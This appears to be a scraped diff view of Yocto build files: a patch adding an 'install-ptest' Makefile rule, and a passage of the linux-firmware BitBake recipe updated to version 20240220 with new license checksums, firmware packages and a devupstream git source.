1Add 'install-ptest' rule.
2
3Signed-off-by: Tudor Florea <tudor.florea@enea.com>
4Upstream-Status: Pending
5
6diff -ruN a/Makefile.am b/Makefile.am
7--- a/Makefile.am 2013-07-12 17:11:05.278331557 +0200
8+++ b/Makefile.am 2013-07-12 17:14:27.033788016 +0200
9@@ -204,6 +204,16 @@
10
11 distclean-local: $(DISTCLEAN_LOCAL_HOOKS)
12
13+install-ptest:
14+ @$(MKDIR_P) $(DESTDIR)/testsuite
15+ @for file in $(TESTSUITE); do \
16+ install $$file $(DESTDIR)/testsuite; \
17+ done;
18+ @sed -e 's/^Makefile/_Makefile/' < Makefile > $(DESTDIR)/Makefile
19+ @$(MKDIR_P) $(DESTDIR)/tools
20+ @cp $(noinst_SCRIPTS) $(noinst_PROGRAMS) $(DESTDIR)/tools
21+ @cp -r testsuite/rootfs testsuite/.libs $(DESTDIR)/testsuite
22+
23 # ------------------------------------------------------------------------------
24 # custom release helpers
25 # ------------------------------------------------------------------------------
diff --git a/meta/recipes-kernel/linux-firmware/linux-firmware_20201218.bb b/meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb
index 700a79b118..873ba9cdf0 100644
--- a/meta/recipes-kernel/linux-firmware/linux-firmware_20201218.bb
+++ b/meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb
@@ -1,4 +1,8 @@
1SUMMARY = "Firmware files for use with Linux kernel" 1SUMMARY = "Firmware files for use with Linux kernel"
2HOMEPAGE = "https://www.kernel.org/"
3DESCRIPTION = "Linux firmware is a package distributed alongside the Linux kernel \
4that contains firmware binary blobs necessary for partial or full functionality \
5of certain hardware devices."
2SECTION = "kernel" 6SECTION = "kernel"
3 7
4LICENSE = "\ 8LICENSE = "\
@@ -23,7 +27,6 @@ LICENSE = "\
23 & Firmware-go7007 \ 27 & Firmware-go7007 \
24 & Firmware-GPLv2 \ 28 & Firmware-GPLv2 \
25 & Firmware-hfi1_firmware \ 29 & Firmware-hfi1_firmware \
26 & Firmware-i2400m \
27 & Firmware-i915 \ 30 & Firmware-i915 \
28 & Firmware-ibt_firmware \ 31 & Firmware-ibt_firmware \
29 & Firmware-ice \ 32 & Firmware-ice \
@@ -42,6 +45,7 @@ LICENSE = "\
42 & Firmware-phanfw \ 45 & Firmware-phanfw \
43 & Firmware-qat \ 46 & Firmware-qat \
44 & Firmware-qcom \ 47 & Firmware-qcom \
48 & Firmware-qcom-yamato \
45 & Firmware-qla1280 \ 49 & Firmware-qla1280 \
46 & Firmware-qla2xxx \ 50 & Firmware-qla2xxx \
47 & Firmware-qualcommAthos_ar3k \ 51 & Firmware-qualcommAthos_ar3k \
@@ -53,7 +57,6 @@ LICENSE = "\
53 & Firmware-rtlwifi_firmware \ 57 & Firmware-rtlwifi_firmware \
54 & Firmware-imx-sdma_firmware \ 58 & Firmware-imx-sdma_firmware \
55 & Firmware-siano \ 59 & Firmware-siano \
56 & Firmware-tda7706-firmware \
57 & Firmware-ti-connectivity \ 60 & Firmware-ti-connectivity \
58 & Firmware-ti-keystone \ 61 & Firmware-ti-keystone \
59 & Firmware-ueagle-atm4-firmware \ 62 & Firmware-ueagle-atm4-firmware \
@@ -68,8 +71,8 @@ LICENSE = "\
68LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \ 71LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
69 file://LICENCE.adsp_sst;md5=615c45b91a5a4a9fe046d6ab9a2df728 \ 72 file://LICENCE.adsp_sst;md5=615c45b91a5a4a9fe046d6ab9a2df728 \
70 file://LICENCE.agere;md5=af0133de6b4a9b2522defd5f188afd31 \ 73 file://LICENCE.agere;md5=af0133de6b4a9b2522defd5f188afd31 \
71 file://LICENSE.amdgpu;md5=d357524f5099e2a3db3c1838921c593f \ 74 file://LICENSE.amdgpu;md5=a2589a05ea5b6bd2b7f4f623c7e7a649 \
72 file://LICENSE.amd-ucode;md5=3c5399dc9148d7f0e1f41e34b69cf14f \ 75 file://LICENSE.amd-ucode;md5=6ca90c57f7b248de1e25c7f68ffc4698 \
73 file://LICENSE.amlogic_vdec;md5=dc44f59bf64a81643e500ad3f39a468a \ 76 file://LICENSE.amlogic_vdec;md5=dc44f59bf64a81643e500ad3f39a468a \
74 file://LICENCE.atheros_firmware;md5=30a14c7823beedac9fa39c64fdd01a13 \ 77 file://LICENCE.atheros_firmware;md5=30a14c7823beedac9fa39c64fdd01a13 \
75 file://LICENSE.atmel;md5=aa74ac0c60595dee4d4e239107ea77a3 \ 78 file://LICENSE.atmel;md5=aa74ac0c60595dee4d4e239107ea77a3 \
@@ -87,13 +90,12 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
87 file://LICENCE.go7007;md5=c0bb9f6aaaba55b0529ee9b30aa66beb \ 90 file://LICENCE.go7007;md5=c0bb9f6aaaba55b0529ee9b30aa66beb \
88 file://GPL-2;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ 91 file://GPL-2;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
89 file://LICENSE.hfi1_firmware;md5=5e7b6e586ce7339d12689e49931ad444 \ 92 file://LICENSE.hfi1_firmware;md5=5e7b6e586ce7339d12689e49931ad444 \
90 file://LICENCE.i2400m;md5=14b901969e23c41881327c0d9e4b7d36 \
91 file://LICENSE.i915;md5=2b0b2e0d20984affd4490ba2cba02570 \ 93 file://LICENSE.i915;md5=2b0b2e0d20984affd4490ba2cba02570 \
92 file://LICENCE.ibt_firmware;md5=fdbee1ddfe0fb7ab0b2fcd6b454a366b \ 94 file://LICENCE.ibt_firmware;md5=fdbee1ddfe0fb7ab0b2fcd6b454a366b \
93 file://LICENSE.ice;md5=742ab4850f2670792940e6d15c974b2f \ 95 file://LICENSE.ice;md5=742ab4850f2670792940e6d15c974b2f \
94 file://LICENCE.IntcSST2;md5=9e7d8bea77612d7cc7d9e9b54b623062 \ 96 file://LICENCE.IntcSST2;md5=9e7d8bea77612d7cc7d9e9b54b623062 \
95 file://LICENCE.it913x;md5=1fbf727bfb6a949810c4dbfa7e6ce4f8 \ 97 file://LICENCE.it913x;md5=1fbf727bfb6a949810c4dbfa7e6ce4f8 \
96 file://LICENCE.iwlwifi_firmware;md5=3fd842911ea93c29cd32679aa23e1c88 \ 98 file://LICENCE.iwlwifi_firmware;md5=2ce6786e0fc11ac6e36b54bb9b799f1b \
97 file://LICENCE.kaweth;md5=b1d876e562f4b3b8d391ad8395dfe03f \ 99 file://LICENCE.kaweth;md5=b1d876e562f4b3b8d391ad8395dfe03f \
98 file://LICENSE.Lontium;md5=4ec8dc582ff7295f39e2ca6a7b0be2b6 \ 100 file://LICENSE.Lontium;md5=4ec8dc582ff7295f39e2ca6a7b0be2b6 \
99 file://LICENCE.Marvell;md5=28b6ed8bd04ba105af6e4dcd6e997772 \ 101 file://LICENCE.Marvell;md5=28b6ed8bd04ba105af6e4dcd6e997772 \
@@ -106,8 +108,9 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
106 file://LICENCE.OLPC;md5=5b917f9d8c061991be4f6f5f108719cd \ 108 file://LICENCE.OLPC;md5=5b917f9d8c061991be4f6f5f108719cd \
107 file://LICENCE.open-ath9k-htc-firmware;md5=1b33c9f4d17bc4d457bdb23727046837 \ 109 file://LICENCE.open-ath9k-htc-firmware;md5=1b33c9f4d17bc4d457bdb23727046837 \
108 file://LICENCE.phanfw;md5=954dcec0e051f9409812b561ea743bfa \ 110 file://LICENCE.phanfw;md5=954dcec0e051f9409812b561ea743bfa \
109 file://LICENCE.qat_firmware;md5=9e7d8bea77612d7cc7d9e9b54b623062 \ 111 file://LICENCE.qat_firmware;md5=72de83dfd9b87be7685ed099a39fbea4 \
110 file://LICENSE.qcom;md5=164e3362a538eb11d3ac51e8e134294b \ 112 file://LICENSE.qcom;md5=164e3362a538eb11d3ac51e8e134294b \
113 file://LICENSE.qcom_yamato;md5=d0de0eeccaf1843a850bf7a6777eec5c \
111 file://LICENCE.qla1280;md5=d6895732e622d950609093223a2c4f5d \ 114 file://LICENCE.qla1280;md5=d6895732e622d950609093223a2c4f5d \
112 file://LICENCE.qla2xxx;md5=505855e921b75f1be4a437ad9b79dff0 \ 115 file://LICENCE.qla2xxx;md5=505855e921b75f1be4a437ad9b79dff0 \
113 file://LICENSE.QualcommAtheros_ar3k;md5=b5fe244fb2b532311de1472a3bc06da5 \ 116 file://LICENSE.QualcommAtheros_ar3k;md5=b5fe244fb2b532311de1472a3bc06da5 \
@@ -119,7 +122,6 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
119 file://LICENCE.rtlwifi_firmware.txt;md5=00d06cfd3eddd5a2698948ead2ad54a5 \ 122 file://LICENCE.rtlwifi_firmware.txt;md5=00d06cfd3eddd5a2698948ead2ad54a5 \
120 file://LICENSE.sdma_firmware;md5=51e8c19ecc2270f4b8ea30341ad63ce9 \ 123 file://LICENSE.sdma_firmware;md5=51e8c19ecc2270f4b8ea30341ad63ce9 \
121 file://LICENCE.siano;md5=4556c1bf830067f12ca151ad953ec2a5 \ 124 file://LICENCE.siano;md5=4556c1bf830067f12ca151ad953ec2a5 \
122 file://LICENCE.tda7706-firmware.txt;md5=835997cf5e3c131d0dddd695c7d9103e \
123 file://LICENCE.ti-connectivity;md5=c5e02be633f1499c109d1652514d85ec \ 125 file://LICENCE.ti-connectivity;md5=c5e02be633f1499c109d1652514d85ec \
124 file://LICENCE.ti-keystone;md5=3a86335d32864b0bef996bee26cc0f2c \ 126 file://LICENCE.ti-keystone;md5=3a86335d32864b0bef996bee26cc0f2c \
125 file://LICENCE.ueagle-atm4-firmware;md5=4ed7ea6b507ccc583b9d594417714118 \ 127 file://LICENCE.ueagle-atm4-firmware;md5=4ed7ea6b507ccc583b9d594417714118 \
@@ -128,8 +130,11 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
128 file://LICENCE.xc4000;md5=0ff51d2dc49fce04814c9155081092f0 \ 130 file://LICENCE.xc4000;md5=0ff51d2dc49fce04814c9155081092f0 \
129 file://LICENCE.xc5000;md5=1e170c13175323c32c7f4d0998d53f66 \ 131 file://LICENCE.xc5000;md5=1e170c13175323c32c7f4d0998d53f66 \
130 file://LICENCE.xc5000c;md5=12b02efa3049db65d524aeb418dd87ca \ 132 file://LICENCE.xc5000c;md5=12b02efa3049db65d524aeb418dd87ca \
131 file://WHENCE;md5=03f0fad70b8b557b56084e3090198021 \ 133 file://WHENCE;md5=${WHENCE_CHKSUM} \
132 " 134 "
135# WHENCE checksum is defined separately to ease overriding it if
136# class-devupstream is selected.
137WHENCE_CHKSUM = "a344e6c28970fc7daafa81c10247aeb6"
133 138
134# These are not common licenses, set NO_GENERIC_LICENSE for them 139# These are not common licenses, set NO_GENERIC_LICENSE for them
135# so that the license files will be copied from fetched source 140# so that the license files will be copied from fetched source
@@ -155,7 +160,6 @@ NO_GENERIC_LICENSE[Firmware-fw_sst_0f28] = "LICENCE.fw_sst_0f28"
155NO_GENERIC_LICENSE[Firmware-go7007] = "LICENCE.go7007" 160NO_GENERIC_LICENSE[Firmware-go7007] = "LICENCE.go7007"
156NO_GENERIC_LICENSE[Firmware-GPLv2] = "GPL-2" 161NO_GENERIC_LICENSE[Firmware-GPLv2] = "GPL-2"
157NO_GENERIC_LICENSE[Firmware-hfi1_firmware] = "LICENSE.hfi1_firmware" 162NO_GENERIC_LICENSE[Firmware-hfi1_firmware] = "LICENSE.hfi1_firmware"
158NO_GENERIC_LICENSE[Firmware-i2400m] = "LICENCE.i2400m"
159NO_GENERIC_LICENSE[Firmware-i915] = "LICENSE.i915" 163NO_GENERIC_LICENSE[Firmware-i915] = "LICENSE.i915"
160NO_GENERIC_LICENSE[Firmware-ibt_firmware] = "LICENCE.ibt_firmware" 164NO_GENERIC_LICENSE[Firmware-ibt_firmware] = "LICENCE.ibt_firmware"
161NO_GENERIC_LICENSE[Firmware-ice] = "LICENSE.ice" 165NO_GENERIC_LICENSE[Firmware-ice] = "LICENSE.ice"
@@ -175,6 +179,7 @@ NO_GENERIC_LICENSE[Firmware-ath9k-htc] = "LICENCE.open-ath9k-htc-firmware"
175NO_GENERIC_LICENSE[Firmware-phanfw] = "LICENCE.phanfw" 179NO_GENERIC_LICENSE[Firmware-phanfw] = "LICENCE.phanfw"
176NO_GENERIC_LICENSE[Firmware-qat] = "LICENCE.qat_firmware" 180NO_GENERIC_LICENSE[Firmware-qat] = "LICENCE.qat_firmware"
177NO_GENERIC_LICENSE[Firmware-qcom] = "LICENSE.qcom" 181NO_GENERIC_LICENSE[Firmware-qcom] = "LICENSE.qcom"
182NO_GENERIC_LICENSE[Firmware-qcom-yamato] = "LICENSE.qcom_yamato"
178NO_GENERIC_LICENSE[Firmware-qla1280] = "LICENCE.qla1280" 183NO_GENERIC_LICENSE[Firmware-qla1280] = "LICENCE.qla1280"
179NO_GENERIC_LICENSE[Firmware-qla2xxx] = "LICENCE.qla2xxx" 184NO_GENERIC_LICENSE[Firmware-qla2xxx] = "LICENCE.qla2xxx"
180NO_GENERIC_LICENSE[Firmware-qualcommAthos_ar3k] = "LICENSE.QualcommAtheros_ar3k" 185NO_GENERIC_LICENSE[Firmware-qualcommAthos_ar3k] = "LICENSE.QualcommAtheros_ar3k"
@@ -186,7 +191,6 @@ NO_GENERIC_LICENSE[Firmware-ralink-firmware] = "LICENCE.ralink-firmware.txt"
186NO_GENERIC_LICENSE[Firmware-rtlwifi_firmware] = "LICENCE.rtlwifi_firmware.txt" 191NO_GENERIC_LICENSE[Firmware-rtlwifi_firmware] = "LICENCE.rtlwifi_firmware.txt"
187NO_GENERIC_LICENSE[Firmware-siano] = "LICENCE.siano" 192NO_GENERIC_LICENSE[Firmware-siano] = "LICENCE.siano"
188NO_GENERIC_LICENSE[Firmware-imx-sdma_firmware] = "LICENSE.sdma_firmware" 193NO_GENERIC_LICENSE[Firmware-imx-sdma_firmware] = "LICENSE.sdma_firmware"
189NO_GENERIC_LICENSE[Firmware-tda7706-firmware] = "LICENCE.tda7706-firmware.txt"
190NO_GENERIC_LICENSE[Firmware-ti-connectivity] = "LICENCE.ti-connectivity" 194NO_GENERIC_LICENSE[Firmware-ti-connectivity] = "LICENCE.ti-connectivity"
191NO_GENERIC_LICENSE[Firmware-ti-keystone] = "LICENCE.ti-keystone" 195NO_GENERIC_LICENSE[Firmware-ti-keystone] = "LICENCE.ti-keystone"
192NO_GENERIC_LICENSE[Firmware-ueagle-atm4-firmware] = "LICENCE.ueagle-atm4-firmware" 196NO_GENERIC_LICENSE[Firmware-ueagle-atm4-firmware] = "LICENCE.ueagle-atm4-firmware"
@@ -199,9 +203,16 @@ NO_GENERIC_LICENSE[WHENCE] = "WHENCE"
199 203
200PE = "1" 204PE = "1"
201 205
202SRC_URI = "${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz" 206SRC_URI = "\
207 ${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz \
208"
209
210BBCLASSEXTEND = "devupstream:target"
211SRC_URI:class-devupstream = "git://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git;protocol=https;branch=main"
212# Pin this to the 20220509 release, override this in local.conf
213SRCREV:class-devupstream ?= "b19cbdca78ab2adfd210c91be15a22568e8b8cae"
203 214
204SRC_URI[sha256sum] = "a1cc1ff72c739f312b095df589e9fd639fc81c3f8f7966377ea35222dc94c04b" 215SRC_URI[sha256sum] = "bf0f239dc0801e9d6bf5d5fb3e2f549575632cf4688f4348184199cb02c2bcd7"
205 216
206inherit allarch 217inherit allarch
207 218
@@ -212,7 +223,8 @@ do_compile() {
212} 223}
213 224
214do_install() { 225do_install() {
215 oe_runmake 'DESTDIR=${D}' 'FIRMWAREDIR=${nonarch_base_libdir}/firmware' install 226 # install-nodedup avoids rdfind dependency
227 oe_runmake 'DESTDIR=${D}' 'FIRMWAREDIR=${nonarch_base_libdir}/firmware' install-nodedup
216 cp GPL-2 LICEN[CS]E.* WHENCE ${D}${nonarch_base_libdir}/firmware/ 228 cp GPL-2 LICEN[CS]E.* WHENCE ${D}${nonarch_base_libdir}/firmware/
217} 229}
218 230
@@ -225,8 +237,10 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
225 ${PN}-sd8887 ${PN}-sd8897 ${PN}-sd8997 ${PN}-usb8997 \ 237 ${PN}-sd8887 ${PN}-sd8897 ${PN}-sd8997 ${PN}-usb8997 \
226 ${PN}-ti-connectivity-license ${PN}-wlcommon ${PN}-wl12xx ${PN}-wl18xx \ 238 ${PN}-ti-connectivity-license ${PN}-wlcommon ${PN}-wl12xx ${PN}-wl18xx \
227 ${PN}-vt6656-license ${PN}-vt6656 \ 239 ${PN}-vt6656-license ${PN}-vt6656 \
240 ${PN}-rs9113 ${PN}-rs9116 \
228 ${PN}-rtl-license ${PN}-rtl8188 ${PN}-rtl8192cu ${PN}-rtl8192ce ${PN}-rtl8192su ${PN}-rtl8723 ${PN}-rtl8821 \ 241 ${PN}-rtl-license ${PN}-rtl8188 ${PN}-rtl8192cu ${PN}-rtl8192ce ${PN}-rtl8192su ${PN}-rtl8723 ${PN}-rtl8821 \
229 ${PN}-rtl8168 \ 242 ${PN}-rtl8168 \
243 ${PN}-rtl8822 \
230 ${PN}-cypress-license \ 244 ${PN}-cypress-license \
231 ${PN}-broadcom-license \ 245 ${PN}-broadcom-license \
232 ${PN}-bcm-0bb4-0306 \ 246 ${PN}-bcm-0bb4-0306 \
@@ -296,10 +310,20 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
296 ${PN}-nvidia-gpu \ 310 ${PN}-nvidia-gpu \
297 ${PN}-netronome-license ${PN}-netronome \ 311 ${PN}-netronome-license ${PN}-netronome \
298 ${PN}-qat ${PN}-qat-license \ 312 ${PN}-qat ${PN}-qat-license \
299 ${PN}-qcom-license \ 313 ${PN}-qcom-license ${PN}-qcom-yamato-license \
300 ${PN}-qcom-venus-1.8 ${PN}-qcom-venus-4.2 ${PN}-qcom-venus-5.2 ${PN}-qcom-venus-5.4 \ 314 ${PN}-qcom-venus-1.8 ${PN}-qcom-venus-4.2 ${PN}-qcom-venus-5.2 ${PN}-qcom-venus-5.4 \
301 ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a530 ${PN}-qcom-adreno-a630 \ 315 ${PN}-qcom-vpu-1.0 ${PN}-qcom-vpu-2.0 \
302 ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \ 316 ${PN}-qcom-adreno-a2xx ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a4xx ${PN}-qcom-adreno-a530 \
317 ${PN}-qcom-adreno-a630 ${PN}-qcom-adreno-a650 ${PN}-qcom-adreno-a660 \
318 ${PN}-qcom-apq8016-modem ${PN}-qcom-apq8016-wifi \
319 ${PN}-qcom-apq8096-adreno ${PN}-qcom-apq8096-audio ${PN}-qcom-apq8096-modem \
320 ${PN}-qcom-sc8280xp-lenovo-x13s-compat \
321 ${PN}-qcom-sc8280xp-lenovo-x13s-audio \
322 ${PN}-qcom-sc8280xp-lenovo-x13s-adreno \
323 ${PN}-qcom-sc8280xp-lenovo-x13s-compute \
324 ${PN}-qcom-sc8280xp-lenovo-x13s-sensors \
325 ${PN}-qcom-sdm845-adreno ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \
326 ${PN}-qcom-sm8250-adreno ${PN}-qcom-sm8250-audio ${PN}-qcom-sm8250-compute \
303 ${PN}-amlogic-vdec-license ${PN}-amlogic-vdec \ 327 ${PN}-amlogic-vdec-license ${PN}-amlogic-vdec \
304 ${PN}-lt9611uxc ${PN}-lontium-license \ 328 ${PN}-lt9611uxc ${PN}-lontium-license \
305 ${PN}-whence-license \ 329 ${PN}-whence-license \
@@ -344,7 +368,7 @@ FILES_${PN}-carl9170 = " \
344RDEPENDS_${PN}-carl9170 += "${PN}-gplv2-license" 368RDEPENDS_${PN}-carl9170 += "${PN}-gplv2-license"
345 369
346# For QualCommAthos 370# For QualCommAthos
347LICENSE_${PN}-ar3k = "Firmware-qualcommAthos_ar3k" 371LICENSE_${PN}-ar3k = "Firmware-qualcommAthos_ar3k & Firmware-atheros_firmware"
348LICENSE_${PN}-ar3k-license = "Firmware-qualcommAthos_ar3k" 372LICENSE_${PN}-ar3k-license = "Firmware-qualcommAthos_ar3k"
349LICENSE_${PN}-ath10k = "Firmware-qualcommAthos_ath10k" 373LICENSE_${PN}-ath10k = "Firmware-qualcommAthos_ath10k"
350LICENSE_${PN}-ath10k-license = "Firmware-qualcommAthos_ath10k" 374LICENSE_${PN}-ath10k-license = "Firmware-qualcommAthos_ath10k"
@@ -368,7 +392,7 @@ FILES_${PN}-qca = " \
368 ${nonarch_base_libdir}/firmware/qca \ 392 ${nonarch_base_libdir}/firmware/qca \
369" 393"
370 394
371RDEPENDS_${PN}-ar3k += "${PN}-ar3k-license" 395RDEPENDS_${PN}-ar3k += "${PN}-ar3k-license ${PN}-atheros-license"
372RDEPENDS_${PN}-ath10k += "${PN}-ath10k-license" 396RDEPENDS_${PN}-ath10k += "${PN}-ath10k-license"
373RDEPENDS_${PN}-ath11k += "${PN}-ath10k-license" 397RDEPENDS_${PN}-ath11k += "${PN}-ath10k-license"
374RDEPENDS_${PN}-qca += "${PN}-ath10k-license" 398RDEPENDS_${PN}-qca += "${PN}-ath10k-license"
@@ -390,7 +414,7 @@ LICENSE_${PN}-mt7601u-license = "Firmware-ralink_a_mediatek_company_firmware"
390 414
391FILES_${PN}-mt7601u-license = "${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware" 415FILES_${PN}-mt7601u-license = "${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware"
392FILES_${PN}-mt7601u = " \ 416FILES_${PN}-mt7601u = " \
393 ${nonarch_base_libdir}/firmware/mt7601u.bin \ 417 ${nonarch_base_libdir}/firmware/mediatek/mt7601u.bin \
394" 418"
395 419
396RDEPENDS_${PN}-mt7601u += "${PN}-mt7601u-license" 420RDEPENDS_${PN}-mt7601u += "${PN}-mt7601u-license"
@@ -492,6 +516,13 @@ FILES_${PN}-netronome = " \
492 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0096*.nffw \ 516 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0096*.nffw \
493 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0097*.nffw \ 517 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0097*.nffw \
494 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0099*.nffw \ 518 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0099*.nffw \
519 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0011_2x40.nffw \
520 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0012_2x40.nffw \
521 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0078-0011_1x100.nffw \
522 ${nonarch_base_libdir}/firmware/netronome/bpf \
523 ${nonarch_base_libdir}/firmware/netronome/flower \
524 ${nonarch_base_libdir}/firmware/netronome/nic \
525 ${nonarch_base_libdir}/firmware/netronome/nic-sriov \
495" 526"
496 527
497RDEPENDS_${PN}-netronome += "${PN}-netronome-license" 528RDEPENDS_${PN}-netronome += "${PN}-netronome-license"
@@ -518,6 +549,16 @@ RDEPENDS_${PN}-nvidia-gpu += "${PN}-nvidia-license"
518RDEPENDS_${PN}-nvidia-tegra += "${PN}-nvidia-license" 549RDEPENDS_${PN}-nvidia-tegra += "${PN}-nvidia-license"
519RDEPENDS_${PN}-nvidia-tegra-k1 += "${PN}-nvidia-license" 550RDEPENDS_${PN}-nvidia-tegra-k1 += "${PN}-nvidia-license"
520 551
552# For RSI RS911x WiFi
553LICENSE_${PN}-rs9113 = "WHENCE"
554LICENSE_${PN}-rs9116 = "WHENCE"
555
556FILES_${PN}-rs9113 = " ${nonarch_base_libdir}/firmware/rsi/rs9113*.rps "
557FILES_${PN}-rs9116 = " ${nonarch_base_libdir}/firmware/rsi/rs9116*.rps "
558
559RDEPENDS_${PN}-rs9113 += "${PN}-whence-license"
560RDEPENDS_${PN}-rs9116 += "${PN}-whence-license"
561
521# For rtl 562# For rtl
522LICENSE_${PN}-rtl8188 = "Firmware-rtlwifi_firmware" 563LICENSE_${PN}-rtl8188 = "Firmware-rtlwifi_firmware"
523LICENSE_${PN}-rtl8192cu = "Firmware-rtlwifi_firmware" 564LICENSE_${PN}-rtl8192cu = "Firmware-rtlwifi_firmware"
@@ -525,6 +566,7 @@ LICENSE_${PN}-rtl8192ce = "Firmware-rtlwifi_firmware"
525LICENSE_${PN}-rtl8192su = "Firmware-rtlwifi_firmware" 566LICENSE_${PN}-rtl8192su = "Firmware-rtlwifi_firmware"
526LICENSE_${PN}-rtl8723 = "Firmware-rtlwifi_firmware" 567LICENSE_${PN}-rtl8723 = "Firmware-rtlwifi_firmware"
527LICENSE_${PN}-rtl8821 = "Firmware-rtlwifi_firmware" 568LICENSE_${PN}-rtl8821 = "Firmware-rtlwifi_firmware"
569LICENSE_${PN}-rtl8822 = "Firmware-rtlwifi_firmware"
528LICENSE_${PN}-rtl-license = "Firmware-rtlwifi_firmware" 570LICENSE_${PN}-rtl-license = "Firmware-rtlwifi_firmware"
529LICENSE_${PN}-rtl8168 = "WHENCE" 571LICENSE_${PN}-rtl8168 = "WHENCE"
530 572
@@ -552,6 +594,11 @@ FILES_${PN}-rtl8821 = " \
552FILES_${PN}-rtl8168 = " \ 594FILES_${PN}-rtl8168 = " \
553 ${nonarch_base_libdir}/firmware/rtl_nic/rtl8168*.fw \ 595 ${nonarch_base_libdir}/firmware/rtl_nic/rtl8168*.fw \
554" 596"
597FILES_${PN}-rtl8822 = " \
598 ${nonarch_base_libdir}/firmware/rtl_bt/rtl8822*.bin \
599 ${nonarch_base_libdir}/firmware/rtw88/rtw8822*.bin \
600 ${nonarch_base_libdir}/firmware/rtlwifi/rtl8822*.bin \
601"
555 602
556RDEPENDS_${PN}-rtl8188 += "${PN}-rtl-license" 603RDEPENDS_${PN}-rtl8188 += "${PN}-rtl-license"
557RDEPENDS_${PN}-rtl8192ce += "${PN}-rtl-license" 604RDEPENDS_${PN}-rtl8192ce += "${PN}-rtl-license"
@@ -559,6 +606,7 @@ RDEPENDS_${PN}-rtl8192cu += "${PN}-rtl-license"
559RDEPENDS_${PN}-rtl8192su = "${PN}-rtl-license" 606RDEPENDS_${PN}-rtl8192su = "${PN}-rtl-license"
560RDEPENDS_${PN}-rtl8723 += "${PN}-rtl-license" 607RDEPENDS_${PN}-rtl8723 += "${PN}-rtl-license"
561RDEPENDS_${PN}-rtl8821 += "${PN}-rtl-license" 608RDEPENDS_${PN}-rtl8821 += "${PN}-rtl-license"
609RDEPENDS_${PN}-rtl8822 += "${PN}-rtl-license"
562RDEPENDS_${PN}-rtl8168 += "${PN}-whence-license" 610RDEPENDS_${PN}-rtl8168 += "${PN}-whence-license"
563 611
564# For ti-connectivity 612# For ti-connectivity
@@ -618,7 +666,9 @@ FILES_${PN}-bcm4329 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4329-sdio.bi
618FILES_${PN}-bcm4330 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4330-sdio.*" 666FILES_${PN}-bcm4330 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4330-sdio.*"
619FILES_${PN}-bcm4334 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4334-sdio.bin" 667FILES_${PN}-bcm4334 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4334-sdio.bin"
620FILES_${PN}-bcm4335 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4335-sdio.bin" 668FILES_${PN}-bcm4335 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4335-sdio.bin"
621FILES_${PN}-bcm4339 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4339-sdio.bin" 669FILES_${PN}-bcm4339 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4339-sdio.bin \
670 ${nonarch_base_libdir}/firmware/cypress/cyfmac4339-sdio.bin \
671"
622FILES_${PN}-bcm43241b0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b0-sdio.bin" 672FILES_${PN}-bcm43241b0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b0-sdio.bin"
623FILES_${PN}-bcm43241b4 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b4-sdio.bin" 673FILES_${PN}-bcm43241b4 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b4-sdio.bin"
624FILES_${PN}-bcm43241b5 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b5-sdio.bin" 674FILES_${PN}-bcm43241b5 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b5-sdio.bin"
@@ -627,12 +677,18 @@ FILES_${PN}-bcm43143 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43143.bin \
627 ${nonarch_base_libdir}/firmware/brcm/brcmfmac43143-sdio.bin \ 677 ${nonarch_base_libdir}/firmware/brcm/brcmfmac43143-sdio.bin \
628" 678"
629FILES_${PN}-bcm43430a0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430a0-sdio.*" 679FILES_${PN}-bcm43430a0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430a0-sdio.*"
